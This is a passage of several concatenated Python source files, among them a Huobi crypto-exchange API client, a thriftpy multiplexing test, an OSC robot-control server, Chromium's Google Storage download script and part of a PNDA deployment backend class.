params, func, callback) #---------------------------------------------------------------------- def getOrder(self, orderid): """查询某一委托""" path = '/v1/order/orders/%s' %orderid params = {} func = self.apiGet callback = self.onGetOrder return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getMatchResult(self, orderid): """查询某一委托""" path = '/v1/order/orders/%s/matchresults' %orderid params = {} func = self.apiGet callback = self.onGetMatchResult return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def placeOrder(self, accountid, amount, symbol, type_, price=None, source=None): """下单""" if self.hostname == HUOBI_API_HOST: path = '/v1/order/orders/place' else: path = '/v1/hadax/order/orders/place' params = { 'account-id': accountid, 'amount': amount, 'symbol': symbol, 'type': type_ } if price: params['price'] = price if source: params['source'] = source func = self.apiPost callback = self.onPlaceOrder return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def cancelOrder(self, orderid): """撤单""" path = '/v1/order/orders/%s/submitcancel' %orderid params = {} func = self.apiPost callback = self.onCancelOrder return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def batchCancel(self, orderids): """批量撤单""" path = '/v1/order/orders/batchcancel' params = { 'order-ids': orderids } func = self.apiPost callback = self.onBatchCancel return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def onError(self, msg, reqid): """错误回调""" print msg, reqid #---------------------------------------------------------------------- def onGetSymbols(self, data, reqid): """查询代码回调""" #print reqid, data for d in data: print d #---------------------------------------------------------------------- def onGetCurrencys(self, data, reqid): """查询货币回调""" print reqid, data #---------------------------------------------------------------------- def onGetTimestamp(self, data, reqid): """查询时间回调""" print reqid, data #---------------------------------------------------------------------- def onGetAccounts(self, data, reqid): """查询账户回调""" print reqid, data #---------------------------------------------------------------------- def onGetAccountBalance(self, data, reqid): """查询余额回调""" print reqid, data for d in data['data']['list']: print d #---------------------------------------------------------------------- def onGetOrders(self, data, reqid): """查询委托回调""" print reqid, data #---------------------------------------------------------------------- def onGetMatchResults(self, data, reqid): """查询成交回调""" print reqid, data #---------------------------------------------------------------------- def onGetOrder(self, data, reqid): """查询单一委托回调""" print reqid, data #---------------------------------------------------------------------- def onGetMatchResult(self, data, reqid): """查询单一成交回调""" print reqid, data #---------------------------------------------------------------------- def onPlaceOrder(self, data, reqid): """委托回调""" print reqid, data #---------------------------------------------------------------------- def onCancelOrder(self, data, reqid): """撤单回调""" print reqid, data #---------------------------------------------------------------------- def onBatchCancel(self, data, reqid): """批量撤单回调""" print reqid, data ######################################################################## class DataApi(object): """行情接口""" #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.ws = None self.url = '' self.reqid = 0 self.active = False self.thread = Thread(target=self.run) self.subDict = {} self.url = '' self.proxyHost = '' self.proxyPort = 0 #---------------------------------------------------------------------- def run(self): """执行连接""" while self.active: try: stream = self.ws.recv() result = zlib.decompress(stream, 47).decode('utf-8') data = json.loads(result) self.onData(data) except zlib.error: self.onError(u'数据解压出错:%s' %stream) except: self.onError('行情服务器连接断开') result = self.reconnect() if not result: self.onError(u'等待3秒后再次重连') sleep(3) else: self.onError(u'行情服务器重连成功') self.resubscribe() #---------------------------------------------------------------------- def reconnect(self): """重连""" try: if not self.proxyHost: self.ws = create_connection(self.url) else: self.ws = create_connection(self.url, http_proxy_host=self.proxyHost, http_proxy_port=self.proxyPort) return True except: msg = traceback.format_exc() self.onError(u'行情服务器重连失败:%s' %msg) return False #---------------------------------------------------------------------- def resubscribe(self): """重新订阅""" d = self.subDict self.subDict = {} for topic in d.keys(): self.subTopic(topic) #---------------------------------------------------------------------- def connect(self, url, proxyHost='', proxyPort=0): """连接""" self.url = url self.proxyHost = proxyHost self.proxyPort = proxyPort try: if not self.proxyHost: self.ws = create_connection(self.url) else: self.ws = create_connection(self.url, http_proxy_host=self.proxyHost, http_proxy_port=self.proxyPort) self.active = True self.thread.start() return True except: msg = traceback.format_exc() self.onError(u'行情服务器连接失败:%s' %msg) return False #---------------------------------------------------------------------- def close(self): """停止""" if self.active: self.active = False self.thread.join() self.ws.close() #---------------------------------------------------------------------- def sendReq(self, req): """发送请求""" stream = json.dumps(req) self.ws.send(stream) #---------------------------------------------------------------------- def pong(self, data): """响应心跳""" req = {'pong': data['ping']} self.sendReq(req) #---------------------------------------------------------------------- def subTopic(self, topic): """订阅主题""" if topic in self.subDict: return self.reqid += 1 req = { 'sub': topic, 'id': str(self.reqid) } self.sendReq(req) self.subDict[topic] = str(self.reqid) #---------------------------------------------------------------------- def unsubTopic(self, topic): """取消订阅主题""" if topic not in self.subDict: return req = { 'unsub': topic, 'id': self.subDict[topic] } self.sendReq(req) del self.subDict[topic] #---------------------------------------------------------------------- def subscribeMarketDepth(self, symbol): """订阅行情深度""" topic = 'market.%s.depth.step0' %symbol self.subTopic(topic) #---------------------------------------------------------------------- def subscribeTradeDetail(self, symbol): """订阅成交细节""" topic = 'market.%s.trade.detail' %symbol self.subTopic(topic) #---------------------------------------------------------------------- def subscribeMarketDetail(self, symbol): """订阅市场细节""" topic = 'market.%s.detail' %symbol self.subTopic(topic) #---------------------------------------------------------------------- def onError(self, msg): """错误推送""" print msg #---------------------------------------------------------------------- def onData(self, data): """数据推送""" if 'ping' in data: self.pong(data) elif 'ch' in data: if 'depth.step' in data['ch']: self.onMarketDepth(data) elif 'trade.detail' in data['ch']: self.onTradeDetail(data) elif 'detail' in data['ch']: self.onMarketDetail(data) elif 'err-code' in data: self.onError(u'错误代码:%s, 信息:%s' %(data['err-code'], data['err-msg'])) #---------------------------------------------------------------------- def onMarketDepth(self, data): """行情深度推送 """ print data #---------------------------------------------------------------------- def onTradeDetail(self, data): """成交细节推送""" print data #---------------------------------------------------------------------- def onMarketDetail(self, data): """市场细节推送""" print data
test_multiplexed.py
# -*- coding: utf-8 -*- from __future__ import absolute_import import os import multiprocessing import time import pytest import thriftpy from thriftpy.protocol import ( TBinaryProtocolFactory, TMultiplexedProtocolFactory ) from thriftpy.rpc import client_context from thriftpy.server import TThreadedServer from thriftpy.thrift import TProcessor, TMultiplexedProcessor from thriftpy.transport import TBufferedTransportFactory, TServerSocket mux = thriftpy.load(os.path.join(os.path.dirname(__file__), "multiplexed.thrift")) sock_path = "/tmp/thriftpy_test.sock" class DispatcherOne(object): def doThingOne(self): return True class DispatcherTwo(object): def doThingTwo(self): return True @pytest.fixture(scope="module") def server(request): p1 = TProcessor(mux.ThingOneService, DispatcherOne()) p2 = TProcessor(mux.ThingTwoService, DispatcherTwo()) mux_proc = TMultiplexedProcessor() mux_proc.register_processor("ThingOneService", p1) mux_proc.register_processor("ThingTwoService", p2) _server = TThreadedServer(mux_proc, TServerSocket(unix_socket=sock_path), iprot_factory=TBinaryProtocolFactory(), itrans_factory=TBufferedTransportFactory()) ps = multiprocessing.Process(target=_server.serve) ps.start() time.sleep(0.1) def fin(): if ps.is_alive(): ps.terminate() try: os.remove(sock_path) except IOError: pass request.addfinalizer(fin) def client_one(timeout=3000): binary_factory = TBinaryProtocolFactory() multiplexing_factory = TMultiplexedProtocolFactory(binary_factory, "ThingOneService") return client_context(mux.ThingOneService, unix_socket=sock_path, timeout=timeout, proto_factory=multiplexing_factory) def client_two(timeout=3000): binary_factory = TBinaryProtocolFactory() multiplexing_factory = TMultiplexedProtocolFactory(binary_factory, "ThingTwoService") return client_context(mux.ThingTwoService, unix_socket=sock_path, timeout=timeout, proto_factory=multiplexing_factory) def test_multiplexed_server(server): with client_one() as c: assert c.doThingOne() is True with client_two() as c: assert c.doThingTwo() is True
run.py
from OnlineHeart import OnlineHeart from Silver import Silver from LotteryResult import LotteryResult from Tasks import Tasks from connect import connect from rafflehandler import Rafflehandler import asyncio from login import login import utils from printer import Printer from statistics import Statistics from bilibili import bilibili import threading import biliconsole loop = asyncio.get_event_loop() loop1 = asyncio.get_event_loop() printer = Printer() bilibili() Statistics() rafflehandler = Rafflehandler() biliconsole.Biliconsole() task = OnlineHeart() task1 = Silver() task2 = Tasks() task3 = LotteryResult() task4 = connect() console_thread = threading.Thread(target=biliconsole.controler) console_thread.start() tasks1 = [ login().login() ] loop.run_until_complete(asyncio.wait(tasks1)) tasks = [ utils.fetch_user_info(), utils.fetch_bag_list(), task.run(), task1.run(), task2.run(), biliconsole.Biliconsole().run(), task4.connect(), task3.query(), rafflehandler.run() ] loop.run_until_complete(asyncio.wait(tasks)) console_thread.join() loop.close()
OscData.py
import argparse import threading import platform from pythonosc import osc_server from pythonosc.dispatcher import Dispatcher from HostnameIp import HostnameIp PLATFORM = platform.machine() if "arm" in PLATFORM: from easygopigo3 import EasyGoPiGo3 # axisA = -255 and 255 # axisB = -255 and 255 # all the others between 0 and 1 (float) SAVE_TO_FILE = False MAXIMUM_SPEED = 1000 MIN_FROM_MAX = -500 MAX_FROM_MAX = 650 class OscData(): def __init__(self, osc_signal_obj): self.osc_signal = osc_signal_obj hostname_ip = HostnameIp() host_ip = hostname_ip.get_ip() parser = argparse.ArgumentParser() parser.add_argument("--ip", default="192.168.1.93", help="The ip to listen on") parser.add_argument("--port", type=int, default=8000, help="The port to listen on") args = parser.parse_args() if "arm" in PLATFORM: self.gpg = EasyGoPiGo3() self.gpg.set_speed(MAXIMUM_SPEED) self.final_data = {} self.data_file = open("data_file.txt", "a+") self.dispatcher = Dispatcher() self.dispatcher.map("/axisA/", self.axisa, "axisa") self.dispatcher.map("/axisB/", self.axisb, "axisb") self.dispatcher.map("/mlX/", self.mlx, "mlx") self.dispatcher.map("/mlY/", self.mly, "mly") self.dispatcher.map("/mlZ/", self.mlz, "mlz") self.dispatcher.map("/kinX/", self.kinx, "kinx") self.dispatcher.map("/kinY/", self.kiny, "kiny") self.dispatcher.map("/kinZ/", self.kinz, "kinz") self.dispatcher.map("/filter/", self.filter, "filter") if "arm" in PLATFORM: self.dispatcher.map("/left/", self.left, "left") self.dispatcher.map("/right/", self.right, "right") server = osc_server.ThreadingOSCUDPServer((args.ip, args.port), self.dispatcher) print("Serving on {}".format(server.server_address)) _serve = server.serve_forever server_thread = threading.Thread(target=_serve) server_thread.daemon = True server_thread.start() def filter(self, unused_addr, args, msg): self.osc_signal.osc_str.emit(str(msg)) def motor_power(self, value): return (((int(value) - MIN_FROM_MAX) * (100 - -100)) / (MAX_FROM_MAX - MIN_FROM_MAX)) + -100 def left(self, unused_addr, args, msg): self.gpg.set_motor_power(self.gpg.MOTOR_LEFT, self.motor_power(msg)) def right(self, unused_addr, args, msg): self.gpg.set_motor_power(self.gpg.MOTOR_RIGHT, self.motor_power(msg)) def axisa(self, unused_addr, args, msg): self.final_data['axisa'] = msg def axisb(self, unused_addr, args, msg): self.final_data['axisb'] = msg if "arm" in PLATFORM: self.gpg.set_motor_power(self.gpg.MOTOR_RIGHT, self.motor_power(msg)) def mlx(self, unused_addr, args, msg): self.final_data['mlx'] = msg def mly(self, unused_addr, args, msg): self.final_data['mly'] = msg def mlz(self, unused_addr, args, msg): self.final_data['mlz'] = msg def kinx(self, unused_addr, args, msg): self.final_data['kinx'] = msg def kiny(self, unused_addr, args, msg): self.final_data['kiny'] = msg def kinz(self, unused_addr, args, msg): self.final_data['kinz'] = msg if SAVE_TO_FILE: self.data_file.write(str(self.final_data) + "\n") self.osc_signal.osc_str.emit(str(self.final_data))
download_from_google_storage.py
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Download files from Google Storage based on SHA1 sums.""" import hashlib import optparse import os import Queue import re import shutil import stat import sys import tarfile import threading import time import subprocess2 GSUTIL_DEFAULT_PATH = os.path.join( os.path.dirname(os.path.abspath(__file__)), 'gsutil.py') # Maps sys.platform to what we actually want to call them. PLATFORM_MAPPING = { 'cygwin': 'win', 'darwin': 'mac', 'linux2': 'linux', 'win32': 'win', } class FileNotFoundError(IOError): pass class InvalidFileError(IOError): pass class InvalidPlatformError(Exception): pass def GetNormalizedPlatform(): """Returns the result of sys.platform accounting for cygwin. Under cygwin, this will always return "win32" like the native Python.""" if sys.platform == 'cygwin': return 'win32' return sys.platform # Common utilities class Gsutil(object): """Call gsutil with some predefined settings. This is a convenience object, and is also immutable.""" MAX_TRIES = 5 RETRY_BASE_DELAY = 5.0 RETRY_DELAY_MULTIPLE = 1.3 def __init__(self, path, boto_path=None, timeout=None, version='4.46'): if not os.path.exists(path): raise FileNotFoundError('GSUtil not found in %s' % path) self.path = path self.timeout = timeout self.boto_path = boto_path self.version = version def get_sub_env(self): env = os.environ.copy() if self.boto_path == os.devnull: env['AWS_CREDENTIAL_FILE'] = '' env['BOTO_CONFIG'] = '' elif self.boto_path: env['AWS_CREDENTIAL_FILE'] = self.boto_path env['BOTO_CONFIG'] = self.boto_path return env def call(self, *args): cmd = [sys.executable, self.path, '--force-version', self.version] cmd.extend(args) return subprocess2.call(cmd, env=self.get_sub_env(), timeout=self.timeout) def check_call(self, *args): cmd = [sys.executable, self.path, '--force-version', self.version] cmd.extend(args) ((out, err), code) = subprocess2.communicate( cmd, stdout=subprocess2.PIPE, stderr=subprocess2.PIPE, env=self.get_sub_env(), timeout=self.timeout) # Parse output. status_code_match = re.search('status=([0-9]+)', err) if status_code_match: return (int(status_code_match.group(1)), out, err) if ('You are attempting to access protected data with ' 'no configured credentials.' in err): return (403, out, err) if 'matched no objects' in err: return (404, out, err) return (code, out, err) def check_call_with_retries(self, *args): delay = self.RETRY_BASE_DELAY for i in xrange(self.MAX_TRIES): code, out, err = self.check_call(*args) if not code or i == self.MAX_TRIES - 1: break time.sleep(delay) delay *= self.RETRY_DELAY_MULTIPLE return code, out, err def check_platform(target): """Checks if any parent directory of target matches (win|mac|linux).""" assert os.path.isabs(target) root, target_name = os.path.split(target) if not target_name: return None if target_name in ('linux', 'mac', 'win'): return target_name return check_platform(root) def get_sha1(filename): sha1 = hashlib.sha1() with open(filename, 'rb') as f: while True: # Read in 1mb chunks, so it doesn't all have to be loaded into memory. chunk = f.read(1024*1024) if not chunk: break sha1.update(chunk) return sha1.hexdigest() # Download-specific code starts here def enumerate_work_queue(input_filename, work_queue, directory, recursive, ignore_errors, output, sha1_file, auto_platform): if sha1_file: if not os.path.exists(input_filename): if not ignore_errors: raise FileNotFoundError('%s not found.' % input_filename) print >> sys.stderr, '%s not found.' % input_filename with open(input_filename, 'rb') as f: sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip()) if sha1_match: work_queue.put((sha1_match.groups(1)[0], output)) return 1 if not ignore_errors: raise InvalidFileError('No sha1 sum found in %s.' % input_filename) print >> sys.stderr, 'No sha1 sum found in %s.' % input_filename return 0 if not directory: work_queue.put((input_filename, output)) return 1 work_queue_size = 0 for root, dirs, files in os.walk(input_filename): if not recursive: for item in dirs[:]: dirs.remove(item) else: for exclude in ['.svn', '.git']: if exclude in dirs: dirs.remove(exclude) for filename in files: full_path = os.path.join(root, filename) if full_path.endswith('.sha1'): if auto_platform: # Skip if the platform does not match. target_platform = check_platform(os.path.abspath(full_path)) if not target_platform: err = ('--auto_platform passed in but no platform name found in ' 'the path of %s' % full_path) if not ignore_errors: raise InvalidFileError(err) print >> sys.stderr, err continue current_platform = PLATFORM_MAPPING[sys.platform] if current_platform != target_platform: continue with open(full_path, 'rb') as f: sha1_match = re.match('^([A-Za-z0-9]{40})$', f.read(1024).rstrip()) if sha1_match: work_queue.put( (sha1_match.groups(1)[0], full_path.replace('.sha1', ''))) work_queue_size += 1 else: if not ignore_errors: raise InvalidFileError('No sha1 sum found in %s.' % filename) print >> sys.stderr, 'No sha1 sum found in %s.' % filename return work_queue_size def _validate_tar_file(tar, prefix): def _validate(tarinfo): """Returns false if the tarinfo is something we explicitly forbid.""" if tarinfo.issym() or tarinfo.islnk(): return False if '..' in tarinfo.name or not tarinfo.name.startswith(prefix): return False return True return all(map(_validate, tar.getmembers())) def _downloader_worker_thread(thread_num, q, force, base_url, gsutil, out_q, ret_codes, verbose, extract, delete=True): while True: input_sha1_sum, output_filename = q.get() if input_sha1_sum is None: return extract_dir = None if extract: if not output_filename.endswith('.tar.gz'): out_q.put('%d> Error: %s is not a tar.gz archive.' % ( thread_num, output_filename)) ret_codes.put((1, '%s is not a tar.gz archive.' % (output_filename))) continue extract_dir = output_filename[0:len(output_filename)-7] if os.path.exists(output_filename) and not force: if not extract or os.path.exists(extract_dir): if get_sha1(output_filename) == input_sha1_sum: if verbose: out_q.put( '%d> File %s exists and SHA1 matches. Skipping.' % ( thread_num, output_filename)) continue # Check if file exists. file_url = '%s/%s' % (base_url, input_sha1_sum) (code, _, err) = gsutil.check_call('ls', file_url) if code != 0: if code == 404: out_q.put('%d> File %s for %s does not exist, skipping.' % ( thread_num, file_url, output_filename)) ret_codes.put((1, 'File %s for %s does not exist.' % ( file_url, output_filename))) else: # Other error, probably auth related (bad ~/.boto, etc). out_q.put('%d> Failed to fetch file %s for %s, skipping. [Err: %s]' % ( thread_num, file_url, output_filename, err)) ret_codes.put((1, 'Failed to fetch file %s for %s. [Err: %s]' % ( file_url, output_filename, err))) continue # Fetch the file. out_q.put('%d> Downloading %s...' % (thread_num, output_filename)) try: if delete: os.remove(output_filename) # Delete the file if it exists already. except OSError: if os.path.exists(output_filename): out_q.put('%d> Warning: deleting %s failed.' % ( thread_num, output_filename)) code, _, err = gsutil.check_call('cp', file_url, output_filename) if code != 0: out_q.put('%d> %s' % (thread_num, err)) ret_codes.put((code, err)) continue remote_sha1 = get_sha1(output_filename) if remote_sha1 != input_sha1_sum: msg = ('%d> ERROR remote sha1 (%s) does not match expected sha1 (%s).' % (thread_num, remote_sha1, input_sha1_sum)) out_q.put(msg) ret_codes.put((20, msg)) continue if extract: if not tarfile.is_tarfile(output_filename): out_q.put('%d> Error: %s is not a tar.gz archive.' % ( thread_num, output_filename)) ret_codes.put((1, '%s is not a tar.gz archive.' % (output_filename))) continue with tarfile.open(output_filename, 'r:gz') as tar: dirname = os.path.dirname(os.path.abspath(output_filename)) if not _validate_tar_file(tar, os.path.basename(extract_dir)): out_q.put('%d> Error: %s contains files outside %s.' % ( thread_num, output_filename, extract_dir)) ret_codes.put((1, '%s contains invalid entries.' % (output_filename))) continue if os.path.exists(extract_dir): try: shutil.rmtree(extract_dir) out_q.put('%d> Removed %s...' % (thread_num, extract_dir)) except OSError: out_q.put('%d> Warning: Can\'t delete: %s' % ( thread_num, extract_dir)) ret_codes.put((1, 'Can\'t delete %s.' % (extract_dir))) continue out_q.put('%d> Extracting %d entries from %s to %s' % (thread_num, len(tar.getmembers()),output_filename, extract_dir)) tar.extractall(path=dirname) # Set executable bit. if sys.platform == 'cygwin': # Under cygwin, mark all files as executable. The executable flag in # Google Storage will not be set when uploading from Windows, so if # this script is running under cygwin and we're downloading an # executable, it will be unrunnable from inside cygwin without this. st = os.stat(output_filename) os.chmod(output_filename, st.st_mode | stat.S_IEXEC) elif sys.platform != 'win32': # On non-Windows platforms, key off of the custom header # "x-goog-meta-executable". code, out, _ = gsutil.check_call('stat', file_url) if code != 0: out_q.put('%d> %s' % (thread_num, err)) ret_codes.put((code, err)) elif re.search(r'executable:\s*1', out): st = os.stat(output_filename) os.chmod(output_filename, st.st_mode | stat.S_IEXEC) def printer_worker(output_queue): while True: line = output_queue.get() # Its plausible we want to print empty lines. if line is None: break print line def download_from_google_storage( input_filename, base_url, gsutil, num_threads, directory, recursive, force, output, ignore_errors, sha1_file, verbose, auto_platform, extract): # Start up all the worker threads. all_threads = [] download_start = time.time() stdout_queue = Queue.Queue() work_queue = Queue.Queue() ret_codes = Queue.Queue() ret_codes.put((0, None)) for thread_num in range(num_threads): t = threading.Thread( target=_downloader_worker_thread, args=[thread_num, work_queue, force, base_url, gsutil, stdout_queue, ret_codes, verbose, extract]) t.daemon = True t.start() all_threads.append(t) printer_thread = threading.Thread(target=printer_worker, args=[stdout_queue]) printer_thread.daemon = True printer_thread.start() # Enumerate our work queue. work_queue_size = enumerate_work_queue( input_filename, work_queue, directory, recursive, ignore_errors, output, sha1_file, auto_platform) for _ in all_threads: work_queue.put((None, None)) # Used to tell worker threads to stop. # Wait for all downloads to finish. for t in all_threads: t.join() stdout_queue.put(None) printer_thread.join() # See if we ran into any errors. max_ret_code = 0 for ret_code, message in ret_codes.queue: max_ret_code = max(ret_code, max_ret_code) if message: print >> sys.stderr, message if verbose and not max_ret_code: print 'Success!' if verbose: print 'Downloading %d files took %1f second(s)' % ( work_queue_size, time.time() - download_start) return max_ret_code def main(args): usage = ('usage: %prog [options] target\n' 'Target must be:\n' ' (default) a sha1 sum ([A-Za-z0-9]{40}).\n' ' (-s or --sha1_file) a .sha1 file, containing a sha1 sum on ' 'the first line.\n' ' (-d or --directory) A directory to scan for .sha1 files.') parser = optparse.OptionParser(usage) parser.add_option('-o', '--output', help='Specify the output file name. Defaults to: ' '(a) Given a SHA1 hash, the name is the SHA1 hash. ' '(b) Given a .sha1 file or directory, the name will ' 'match (.*).sha1.') parser.add_option('-b', '--bucket', help='Google Storage bucket to fetch from.') parser.add_option('-e', '--boto', help='Specify a custom boto file.') parser.add_option('-c', '--no_resume', action='store_true', help='DEPRECATED: Resume download if file is ' 'partially downloaded.') parser.add_option('-f', '--force', action='store_true', help='Force download even if local file exists.') parser.add_option('-i', '--ignore_errors', action='store_true', help='Don\'t throw error if we find an invalid .sha1 file.') parser.add_option('-r', '--recursive', action='store_true', help='Scan folders recursively for .sha1 files. ' 'Must be used with -d/--directory') parser.add_option('-t', '--num_threads', default=1, type='int', help='Number of downloader threads to run.') parser.add_option('-d', '--directory', action='store_true', help='The target is a directory. ' 'Cannot be used with -s/--sha1_file.') parser.add_option('-s', '--sha1_file', action='store_true', help='The target is a file containing a sha1 sum. ' 'Cannot be used with -d/--directory.') parser.add_option('-g', '--config', action='store_true', help='Alias for "gsutil config". Run this if you want ' 'to initialize your saved Google Storage ' 'credentials. This will create a read-only ' 'credentials file in ~/.boto.depot_tools.') parser.add_option('-n', '--no_auth', action='store_true', help='Skip auth checking. Use if it\'s known that the ' 'target bucket is a public bucket.') parser.add_option('-p', '--platform', help='A regular expression that is compared against ' 'Python\'s sys.platform. If this option is specified, ' 'the download will happen only if there is a match.') parser.add_option('-a', '--auto_platform', action='store_true', help='Detects if any parent folder of the target matches ' '(linux|mac|win). If so, the script will only ' 'process files that are in the paths that ' 'that matches the current platform.') parser.add_option('-u', '--extract', action='store_true', help='Extract a downloaded tar.gz file. ' 'Leaves the tar.gz file around for sha1 verification' 'If a directory with the same name as the tar.gz ' 'file already exists, is deleted (to get a ' 'clean state in case of update.)') parser.add_option('-v', '--verbose', action='store_true', default=True, help='DEPRECATED: Defaults to True. Use --no-verbose ' 'to suppress.') parser.add_option('-q', '--quiet', action='store_false', dest='verbose', help='Suppresses diagnostic and progress information.') (options, args) = parser.parse_args() # Make sure we should run at all based on platform matching. if options.platform: if options.auto_platform: parser.error('--platform can not be specified with --auto_platform') if not re.match(options.platform, GetNormalizedPlatform()): if options.verbose: print('The current platform doesn\'t match "%s", skipping.' % options.platform) return 0 # Set the boto file to /dev/null if we don't need auth. if options.no_auth: if (set(('http_proxy', 'https_proxy')).intersection( env.lower() for env in os.environ) and 'NO_AUTH_BOTO_CONFIG' not in os.environ): print >> sys.stderr, ('NOTICE: You have PROXY values set in your ' 'environment, but gsutil in depot_tools does not ' '(yet) obey them.') print >> sys.stderr, ('Also, --no_auth prevents the normal BOTO_CONFIG ' 'environment variable from being used.') print >> sys.stderr, ('To use a proxy in this situation, please supply ' 'those settings in a .boto file pointed to by ' 'the NO_AUTH_BOTO_CONFIG environment var.') options.boto = os.environ.get('NO_AUTH_BOTO_CONFIG', os.devnull) # Make sure gsutil exists where we expect it to. if os.path.exists(GSUTIL_DEFAULT_PATH): gsutil = Gsutil(GSUTIL_DEFAULT_PATH, boto_path=options.boto) else: parser.error('gsutil not found in %s, bad depot_tools checkout?' % GSUTIL_DEFAULT_PATH) # Passing in -g/--config will run our copy of GSUtil, then quit. if options.config: print '===Note from depot_tools===' print 'If you do not have a project ID, enter "0" when asked for one.' print '===End note from depot_tools===' print return gsutil.call('config') if not args: parser.error('Missing target.') if len(args) > 1: parser.error('Too many targets.') if not options.bucket: parser.error('Missing bucket. Specify bucket with --bucket.') if options.sha1_file and options.directory: parser.error('Both --directory and --sha1_file are specified, ' 'can only specify one.') if options.recursive and not options.directory: parser.error('--recursive specified but --directory not specified.') if options.output and options.directory: parser.error('--directory is specified, so --output has no effect.') if (not (options.sha1_file or options.directory) and options.auto_platform): parser.error('--auto_platform must be specified with either ' '--sha1_file or --directory') input_filename = args[0] # Set output filename if not specified. if not options.output and not options.directory: if not options.sha1_file: # Target is a sha1 sum, so output filename would also be the sha1 sum. options.output = input_filename elif options.sha1_file: # Target is a .sha1 file. if not input_filename.endswith('.sha1'): parser.error('--sha1_file is specified, but the input filename ' 'does not end with .sha1, and no --output is specified. ' 'Either make sure the input filename has a .sha1 ' 'extension, or specify --output.') options.output = input_filename[:-5] else: parser.error('Unreachable state.') base_url = 'gs://%s' % options.bucket return download_from_google_storage( input_filename, base_url, gsutil, options.num_threads, options.directory, options.recursive, options.force, options.output, options.ignore_errors, options.sha1_file, options.verbose, options.auto_platform, options.extract) if __name__ == '__main__': sys.exit(main(sys.argv))
backend_base.py
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright (c) 2016 Cisco and/or its affiliates. # This software is licensed to you under the terms of the Apache License, Version 2.0 # (the "License"). # You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # The code, technical concepts, and all information contained herein, are the property of # Cisco Technology, Inc.and/or its affiliated entities, under various laws including copyright, # international treaties, patent, and/or contract. # Any use of the material herein must be in accordance with the terms of the License. # All rights not expressly granted by the License are reserved. # Unless required by applicable law or agreed to separately in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. # # Purpose: Backend base implementation for creating PNDA import uuid import sys import os import os.path import json import time import traceback import tarfile import Queue import StringIO from threading import Thread import requests import yaml import pnda_cli_utils as utils from pnda_cli_utils import PNDAConfigException from pnda_cli_utils import MILLI_TIME from pnda_cli_utils import to_runfile from ssh_client import SshClient from service_registry_consul import ServiceRegistryConsul import subprocess_to_log utils.init_logging() CONSOLE = utils.CONSOLE_LOGGER LOG = utils.FILE_LOGGER LOG_FILE_NAME = utils.LOG_FILE_NAME THROW_BASH_ERROR = "cmd_result=${PIPESTATUS[0]} && if [ ${cmd_result} != '0' ]; then exit ${cmd_result}; fi" class BaseBackend(object): ''' Base class for deploying PNDA Must to be overridden to support specific deployment targets ''' def __init__(self, pnda_env, cluster, no_config_check, flavor, keyfile, branch): self._pnda_env = pnda_env self._cluster = cluster self._ssh_client = SshClient(self._cluster) self._no_config_check = no_config_check self._flavor = flavor self._keyfile = keyfile self._branch = branch if flavor is not None: self._node_config = self.load_node_config() self._cached_instance_map = None self._set_up_env_conf() self._service_registry = ServiceRegistryConsul(self._ssh_client) ### Public interface def create(self, node_counts): ''' Create a new PNDA deployment Parameters: - node_counts: a dictionary containing counts of the number of nodes required. Should contain the following keys: 'datanodes', 'opentsdb_nodes', 'kafka_nodes', 'zk_nodes' ''' if not self._no_config_check: self._check_config(self._keyfile) self.pre_install_pnda(node_counts) self._set_up_env_conf() self._install_pnda() self.post_install_pnda() instance_map = self.get_instance_map() return instance_map[self._cluster + '-' + self._node_config['console-instance']]['private_ip_address'] def expand(self, node_counts, do_orchestrate): ''' Expand an existing PNDA deployment Parameters: - node_counts: a dictionary containing counts of the number of nodes required. Should contain the following keys: 'datanodes', 'opentsdb_nodes', 'kafka_nodes', 'zk_nodes' - do_orchestrate: set to True to include the orchestrate phase during PNDA installation, this is required when performing an operation that affects the Hadoop cluster, e.g. increasing the number of datanodes ''' if not self._no_config_check: self._check_config(self._keyfile) self.pre_expand_pnda(node_counts) self._expand_pnda(do_orchestrate) self.post_expand_pnda() instance_map = self.get_instance_map() return instance_map[self._cluster + '-' + self._node_config['console-instance']]['private_ip_address'] def destroy(self): ''' Destroy an existing PNDA deployment ''' self.pre_destroy_pnda() self._destroy_pnda() self.post_destroy_pnda() def get_instance_map(self, check_bootstrapped=False): ''' Generate a descriptor of the instances that make up the PNDA cluster Parameters: - check_bootstrapped: set to True to include a 'bootstrapped' flag on each element that indicated whether that instance is already bootstrapped. Notes: - The instance map is cached. Use clear_instance_map_cache() to force recalculation otherwise the cached version will be returned. This is because the operation is potentially slow if check_bootstrapped is used. ''' if not self._cached_instance_map: instance_map = self.fill_instance_map() self._ssh_client.set_ip_mappings(instance_map) if check_bootstrapped: self._check_hosts_bootstrapped(instance_map, self._cluster + '-' + self._node_config['bastion-instance'] in instance_map) self._cached_instance_map = instance_map return self._cached_instance_map def clear_instance_map_cache(self): ''' Clear the instance map cache so that the instance map will be recalculated on the next call to get_instance_map. ''' self._cached_instance_map = None ### Methods that may be overridden in implementation class to introduce deployment ### specific behaviour def check_target_specific_config(self): ''' Perform checks specific to the deployment target in question ''' pass def load_node_config(self): ''' Generate a config descriptor that indicates certain special nodes (i.e. console, bastion & saltmaster) ''' pass def fill_instance_map(self): ''' Generate a descriptor of the instances that make up the PNDA cluster ''' pass def pre_install_pnda(self, node_counts): ''' Hook that is called before PNDA is installed to allow operations specific to the deployment target in question ''' pass def post_install_pnda(self): ''' Hook that is called after PNDA is installed to allow operations specific to the deployment target in question ''' pass def pre_expand_pnda(self, node_counts): ''' Hook that is called before PNDA is expanded to allow operations specific to the deployment target in question ''' pass def post_expand_pnda(self): ''' Hook that is called after PNDA is expanded to allow operations specific to the deployment target in question ''' pass def pre_destroy_pnda(self): ''' Hook that is called before PNDA is destroyed to allow operations specific to the deployment target in question ''' pass def post_destroy_pnda(self): ''' Hook that is called after PNDA is destroyed to allow operations specific to the deployment target in question ''' pass ### END (Methods that should be overridden in implementation class) ### def _ship_certs(self, 